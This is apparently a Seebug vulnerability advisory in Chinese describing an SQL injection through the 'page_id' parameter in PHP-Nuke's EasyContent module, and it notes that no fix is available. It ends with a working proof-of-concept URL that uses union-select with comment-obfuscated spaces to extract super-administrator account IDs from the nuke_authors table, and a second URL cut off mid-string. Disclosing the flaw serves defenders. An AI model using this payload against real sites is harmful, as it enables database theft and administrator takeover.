PHP-Nuke EasyContent模块'page_id' SQL注入漏洞

2008-02-23T00:00:00
ID SSV:2932
Type seebug
Reporter Root
Modified 2008-02-23T00:00:00

Description

BUGTRAQ ID: 27897 CNCAN ID:CNCAN-2008022206

PHP-Nuke EasyContent模块是一款基于PHP的WEB应用程序。 PHP-Nuke EasyContent模块不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行SQL注入攻击,可获得敏感信息或操作数据库。 问题是由于脚本对用户提交的'page_id'参数处理缺少充分过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。

PHP-Nuke EasyContent Module 目前没有详细解决方案提供: <a href=http://www.phpnuke.org/ target=_blank>http://www.phpnuke.org/</a>

                                        
                                            
                                                http://www.example.com/modules.php?op=modload&amp;amp;name=EasyContent&amp;amp;file=index&amp;amp;menu=410&amp;amp;page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*&nbsp;
http://www.example.com/modules.